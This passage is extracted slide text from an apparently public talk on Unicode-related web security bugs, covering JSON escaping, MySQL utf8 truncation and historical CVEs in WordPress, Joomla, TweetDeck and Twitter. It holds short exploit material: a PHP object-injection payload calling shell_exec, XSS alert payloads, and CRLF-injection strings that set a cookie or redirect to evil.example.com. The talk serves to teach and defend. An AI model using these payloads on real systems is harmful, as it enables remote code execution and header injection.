$ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c (U+3C00 CJK UNIFIED IDEOGRAPH-3C00)

Slide 86

Slide 86 text

$ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c s (U+0073 LATIN SMALL LETTER S)

Slide 87

Slide 87 text

No content

Slide 88

Slide 88 text

No content

Slide 89

Slide 89 text

https://mths.be/brl

Slide 90

Slide 90 text

https://mths.be/brl OBAMA vs. ᴼᴮᴬᴹᴬ

Slide 91

Slide 91 text

No content

Slide 92

Slide 92 text

https://mths.be/bvf

Slide 93

Slide 93 text

https://mths.be/bvf

Slide 94

Slide 94 text

JavaScript vs. JSON

Slide 95

Slide 95 text

// <?php echo strip($userInput); ?>

Slide 96

Slide 96 text

https://mths.be/brn

Slide 97

Slide 97 text

https://mths.be/brn

Slide 98

Slide 98 text

// <?php echo strip($userInput); ?> foo[U+2028]alert('XSS')

Slide 99

Slide 99 text

// <?php echo strip($userInput); ?> ✘ foo[U+2028]alert('XSS')

Slide 100

Slide 100 text

JSON ∉ JavaScript

Slide 101

Slide 101 text

var data = '"Hello\u2028"'; // JSON-formatted data containing a string // containing an (unescaped!) Line Separator eval('(' + data + ')'); // h SyntaxError: Unexpected token ILLEGAL JSON.parse(data); // h 'Hello\u2028'

Slide 102

Slide 102 text

Always escape JSON-formatted data before passing it to a JavaScript parser. https://mths.be/jsesc

Slide 103

Slide 103 text

https://mths.be/jsesc

Slide 104

Slide 104 text

var data = 'foo\u2028'; var serialized = JSON.stringify(data); // h '"foo\u2028"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\u2028"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc

Slide 105

Slide 105 text

var data = 'foo\u2028'; var serialized = JSON.stringify(data); // h '"foo\u2028"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\u2028"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc

Slide 106

Slide 106 text

var string = String.fromCharCode(0xD800); // a string containing an (unescaped!) // lone surrogate var data = JSON.stringify(string); // the same string as JSON-formatted data storeInDatabaseAsUtf8(data); // h error/crash sendOverWebSocketConnection(data); // h error/crash/DoS

Slide 107

Slide 107 text

Always escape JSON-formatted data before passing it to a UTF-8 encoder. https://mths.be/jsesc

Slide 108

Slide 108 text

https://mths.be/jsesc

Slide 109

Slide 109 text

var data = 'foo\uD800'; var serialized = JSON.stringify(data); // h '"foo\uD800"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\uD800"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc

Slide 110

Slide 110 text

var data = 'foo\uD800'; var serialized = JSON.stringify(data); // h '"foo\uD800"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\uD800"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc

Slide 111

Slide 111 text

Phabricator

Slide 112

Slide 112 text

No content

Slide 113

Slide 113 text

No content

Slide 114

Slide 114 text

No content

Slide 115

Slide 115 text

uses MySQL

Slide 116

Slide 116 text

uses MySQL’s ✌utf8✌

Slide 117

Slide 117 text

No content

Slide 118

Slide 118 text

No content

Slide 119

Slide 119 text

https://mths.be/bro

Slide 120

Slide 120 text

RCE in WordPress < 3.6.1 https://mths.be/brq

Slide 121

Slide 121 text

CVE-2013-4338 “wp-includes/functions.php in WordPress before 3.6.1 does not properly determine whether data has been serialize()d, which allows remote attackers to execute arbitrary code by triggering erroneous PHP unserialize() operations.” https://mths.be/brq

Slide 122

Slide 122 text

function is_serialized( $data ) { $data = trim( $data ); $length = strlen( $data ); $lastc = $data[$length - 1]; if ( ';' !== $lastc && '}' !== $lastc ) return false; $token = $data[0]; switch ( $token ) { case 's' : if ( '"' !== $data[$length - 2] ) return false; case 'a' : case 'O' : return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data ); case 'b' : case 'i' : case 'd' : return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/", $data ); } return false; } https://mths.be/brq

Slide 123

Slide 123 text

function is_serialized( $data ) { $data = trim( $data ); $length = strlen( $data ); $lastc = $data[$length - 1]; if ( ';' !== $lastc && '}' !== $lastc ) return false; $token = $data[0]; switch ( $token ) { case 's' : if ( '"' !== $data[$length - 2] ) return false; case 'a' : case 'O' : return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data ); case 'b' : case 'i' : case 'd' : return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/", $data ); } return false; } https://mths.be/brq

Slide 124

Slide 124 text

WordPress Before writing it to the database, data gets serialized only if it’s an array or an object, or if is_serialized($data) returns true (double serialization) After retrieving data from the database, it gets unserialized only if is_serialized($data) returns true https://mths.be/brq

Slide 125

Slide 125 text

WordPress Before writing it to the database, data gets serialized only if it’s an array or an object, or if is_serialized($data) returns true (double serialization) After retrieving data from the database, it gets unserialized only if is_serialized($data) returns true https://mths.be/brq uses MySQL’s ✌utf8✌

Slide 126

Slide 126 text

http://mths.be/brq

Slide 127

Slide 127 text

http://mths.be/brq

Slide 128

Slide 128 text

class Foo { private $command; public function setCommand($command) { $this->command = $command; } public function __destruct() { if ($this->command) { shell_exec($this->command); } } } $object = new Foo(); $object->setCommand('echo "pwned!" > /tmp/pwned.txt'); $serialized = serialize($object); $payload = $serialized . '!'; https://mths.be/brq

Slide 129

Slide 129 text

https://mths.be/brq

Slide 130

Slide 130 text

RCE in Joomla < 3.4.6 https://mths.be/bvg

Slide 131

Slide 131 text

CVE-2015-8562 “Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.” https://mths.be/bvg

Slide 132

Slide 132 text

https://mths.be/bvh Exploit 1. Serialize a specially-crafted object containing PHP code to be executed 2. Use that as HTTP User-Agent header value, with ! as suffix

Slide 133

Slide 133 text

XSS in WordPress < 4.1.2 https://mths.be/buj

Slide 134

Slide 134 text

foo https://mths.be/buj Exploit: post comment

Slide 135

Slide 135 text

foo https://mths.be/buj Exploit: post comment This is safe HTML (no XSS).

Slide 136

Slide 136 text

foo https://mths.be/buj Exploit: post comment This is safe HTML (no XSS). While saving to the ✌utf8✌ MySQL database, it gets truncated, so we get:

Slide 137

Slide 137 text

foo https://mths.be/buj Exploit: post comment foo This is safe HTML (no XSS). While saving to the ✌utf8✌ MySQL database, it gets truncated, so we get:

Slide 138

Slide 138 text

https://mths.be/buj

Slide 139

Slide 139 text

TweetDeck

Slide 140

Slide 140 text

No content

Slide 141

Slide 141 text

No content

Slide 142

Slide 142 text

No content

Slide 143

Slide 143 text

function getTweetHtml(tweet) { var htmlEscapedTweet = htmlEscape(tweet); if (containsEmoji(htmlEscapedTweet)) { return replaceSymbolsWithImgTags( AccidentallyUndoHtmlEscaping(htmlEscapedTweet) ); } else { return htmlEscapedTweet; } } https://mths.be/bsq

Slide 144

Slide 144 text

Twitter

Slide 145

Slide 145 text

https://mths.be/bsq https://mths.be/buh

Slide 146

Slide 146 text

https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ]

Slide 147

Slide 147 text

https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] ✘

Slide 148

Slide 148 text

https://mths.be/buh symbol 㻿 code point U+560A URL-encoded (note: uses UTF-8!) %E5%98%8A decoded (raw bytes) [ 0x56, 0x0A ] Bypass part 1: CR (U+000A)

Slide 149

Slide 149 text

https://mths.be/buh symbol 㼁 code point U+560D URL-encoded (note: uses UTF-8!) %E5%98%8D decoded (raw bytes) [ 0x56, 0x0D ] Bypass part 2: LF (U+000D)

Slide 150

Slide 150 text

https://mths.be/buh Example exploit %E5%98%8A%E5%98%8DSet-Cookie:%20test

Slide 151

Slide 151 text

No content

Slide 152

Slide 152 text

https://mths.be/bve

Slide 153

Slide 153 text

https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ]

Slide 154

Slide 154 text

https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] ✘

Slide 155

Slide 155 text

https://mths.be/bve symbol 㻿 code point U+560A URL-encoded (note: uses UTF-8!) %E5%98%8A decoded (raw bytes) [ 0x56, 0x0A ] Bypass part 1: CR (U+000A)

Slide 156

Slide 156 text

https://mths.be/bve symbol 㼁 code point U+560D URL-encoded (note: uses UTF-8!) %E5%98%8D decoded (raw bytes) [ 0x56, 0x0D ] Bypass part 2: LF (U+000D)

Slide 157

Slide 157 text

https://mths.be/bve Example exploit %E5%98%8A%E5%98%8DLocation:%20https: %2F%2Fevil.example.com%2F

Slide 158

Slide 158 text

Thanks! Questions? → @mathias